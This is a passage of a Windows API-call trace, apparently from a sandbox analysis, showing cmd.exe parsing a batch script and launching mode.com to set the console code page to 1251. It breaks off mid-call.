lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0033.304] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.304] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.304] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0033.304] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.304] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.304] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.304] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e340, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0033.304] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.304] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.305] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e342, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0033.305] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.305] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.305] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e344, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0033.305] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.305] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.305] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e346, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0033.305] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.305] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.305] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e348, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0033.305] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.305] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.305] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0033.305] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.305] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.305] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0033.305] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.305] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.305] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.305] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0033.306] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.306] GetFileType (hFile=0xe8) returned 0x3 [0033.306] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.306] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.306] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.306] GetFileType (hFile=0xf4) returned 0x3 [0033.306] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.306] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0033.306] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x31f958, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31f958*=0x18, lpOverlapped=0x0) returned 1 [0033.306] GetProcessHeap () returned 0xc0000 [0033.306] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x4012) returned 0xdcd20 [0033.306] GetProcessHeap () returned 0xc0000 [0033.306] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdcd20 | out: hHeap=0xc0000) returned 1 [0033.307] _wcsicmp (_String1="mode", _String2=")") returned 68 [0033.307] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0033.307] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0033.307] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0033.307] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0033.307] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0033.307] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0033.307] GetProcessHeap () returned 0xc0000 [0033.307] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xb0) returned 0xd97e0 [0033.307] GetProcessHeap () returned 0xc0000 [0033.307] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x1a) returned 0xd4610 [0033.307] GetProcessHeap () returned 0xc0000 [0033.307] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x38) returned 0xd6510 [0033.308] GetConsoleOutputCP () returned 0x1b5 [0033.308] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a45bfe0 | out: lpCPInfo=0x4a45bfe0) returned 1 [0033.308] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0033.309] GetConsoleTitleW (in: lpConsoleTitle=0x31f910, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0033.309] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0033.309] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0033.309] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0033.309] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0033.309] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0033.309] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0033.309] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0033.309] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0033.309] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0033.309] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0033.309] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0033.309] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0033.309] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0033.309] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0033.309] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0033.309] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0033.309] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0033.309] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0033.309] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0033.309] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0033.309] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0033.310] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0033.310] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0033.310] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0033.310] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0033.310] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0033.310] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0033.310] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0033.310] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0033.310] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0033.310] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0033.310] _wcsicmp (_String1="mode", _String2="START") returned -6 [0033.310] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0033.310] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0033.310] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0033.310] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0033.310] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0033.310] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0033.310] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0033.310] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0033.310] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0033.310] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0033.310] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0033.310] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0033.310] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0033.310] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0033.310] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0033.310] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0033.310] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0033.310] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0033.310] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0033.310] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0033.310] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0033.310] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0033.310] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0033.310] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0033.310] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0033.310] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0033.311] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0033.311] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0033.311] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0033.311] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0033.311] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0033.311] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0033.311] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0033.311] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0033.311] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0033.311] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0033.311] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0033.311] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0033.311] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0033.311] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0033.311] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0033.311] _wcsicmp (_String1="mode", _String2="START") returned -6 [0033.311] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0033.311] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0033.311] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0033.311] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0033.311] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0033.311] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0033.311] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0033.311] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0033.311] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0033.311] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0033.311] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0033.311] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0033.311] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0033.311] GetProcessHeap () returned 0xc0000 [0033.311] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x218) returned 0xc1ab0 [0033.311] GetProcessHeap () returned 0xc0000 [0033.312] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x42) returned 0xd98a0 [0033.312] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0033.312] GetProcessHeap () returned 0xc0000 [0033.312] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x420) returned 0xd9a80 [0033.312] SetErrorMode (uMode=0x0) returned 0x0 [0033.312] SetErrorMode (uMode=0x1) returned 0x0 [0033.312] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd9a90, lpFilePart=0x31f1a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f1a0*="Desktop") returned 0x25 [0033.312] SetErrorMode (uMode=0x0) returned 0x1 [0033.312] GetProcessHeap () returned 0xc0000 [0033.312] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd9a80, Size=0x66) returned 0xd9a80 [0033.312] GetProcessHeap () returned 0xc0000 [0033.312] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd9a80) returned 0x66 [0033.312] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0033.312] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0033.312] GetProcessHeap () returned 0xc0000 [0033.312] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x128) returned 0xc1cd0 [0033.312] GetProcessHeap () returned 0xc0000 [0033.312] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x240) returned 0xd9b00 [0033.318] GetProcessHeap () returned 0xc0000 [0033.318] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd9b00, Size=0x12a) returned 0xd9b00 [0033.318] GetProcessHeap () returned 0xc0000 [0033.318] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd9b00) returned 0x12a [0033.318] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0033.318] GetProcessHeap () returned 0xc0000 [0033.318] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xe8) returned 0xd5b70 [0033.318] GetProcessHeap () returned 0xc0000 [0033.318] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd5b70, Size=0x7e) returned 0xd5b70 [0033.318] GetProcessHeap () returned 0xc0000 [0033.318] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd5b70) returned 0x7e [0033.320] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0033.320] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x31ef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ef10) returned 0xffffffffffffffff [0033.320] GetLastError () returned 0x2 [0033.320] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode", fInfoLevelId=0x1, lpFindFileData=0x31ef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ef10) returned 0xffffffffffffffff [0033.320] GetLastError () returned 0x2 [0033.320] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0033.320] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x31ef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ef10) returned 0xd5c00 [0033.321] GetProcessHeap () returned 0xc0000 [0033.321] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x0, Size=0x28) returned 0xd4640 [0033.321] FindClose (in: hFindFile=0xd5c00 | out: hFindFile=0xd5c00) returned 1 [0033.321] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x31ef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ef10) returned 0xd5c00 [0033.321] GetProcessHeap () returned 0xc0000 [0033.321] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd4640, Size=0x8) returned 0xd98f0 [0033.321] FindClose (in: hFindFile=0xd5c00 | out: hFindFile=0xd5c00) returned 1 [0033.321] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0033.321] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0033.321] GetConsoleTitleW (in: lpConsoleTitle=0x31f460, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0033.321] GetProcessHeap () returned 0xc0000 [0033.321] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x21c) returned 0xd9c40 [0033.321] GetConsoleTitleW (in: lpConsoleTitle=0xd9c50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0033.321] GetProcessHeap () returned 0xc0000 [0033.321] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd9c40, Size=0xa8) returned 0xd9c40 [0033.321] GetProcessHeap () returned 0xc0000 [0033.321] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd9c40) returned 0xa8 [0033.321] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0033.322] GetProcessHeap () returned 0xc0000 [0033.322] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd9c40 | out: hHeap=0xc0000) returned 1 [0033.322] InitializeProcThreadAttributeList (in: lpAttributeList=0x31f218, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x31f1d8 | out: lpAttributeList=0x31f218, lpSize=0x31f1d8) returned 1 [0033.322] UpdateProcThreadAttribute (in: lpAttributeList=0x31f218, dwFlags=0x0, Attribute=0x60001, lpValue=0x31f1c8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x31f218, lpPreviousValue=0x0) returned 1 [0033.322] GetStartupInfoW (in: lpStartupInfo=0x31f330 | out: lpStartupInfo=0x31f330*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0033.322] GetProcessHeap () returned 0xc0000 [0033.322] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x20) returned 0xd4640 [0033.322] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0033.322] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0033.322] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0033.322] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0033.322] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0033.322] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0033.322] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0033.322] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0033.322] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0033.323] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0033.323] GetProcessHeap () returned 0xc0000 [0033.324] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd4640 | out: hHeap=0xc0000) returned 1 [0033.324] GetProcessHeap () returned 0xc0000 [0033.324] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x12) returned 0xd8900 [0033.324] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x31f250*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31f200 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x31f200*(hProcess=0x54, hThread=0x50, dwProcessId=0x990, dwThreadId=0x994)) returned 1 [0033.416] CloseHandle (hObject=0x50) returned 1 [0033.416] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0033.416] GetProcessHeap () returned 0xc0000 [0033.416] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdc230 | out: hHeap=0xc0000) returned 1 [0033.416] GetEnvironmentStringsW () returned 0xdaa10* [0033.416] GetProcessHeap () returned 0xc0000 [0033.416] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xae8) returned 0xdb500 [0033.416] FreeEnvironmentStringsW (penv=0xdaa10) returned 1 [0033.416] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76f50000 [0033.417] GetProcAddress (hModule=0x76f50000, lpProcName="NtQueryInformationProcess") returned 0x76fa14a0 [0033.417] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x31eb08, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x31eb08, ReturnLength=0x0) returned 0x0 [0033.417] ReadProcessMemory (in: hProcess=0x54, 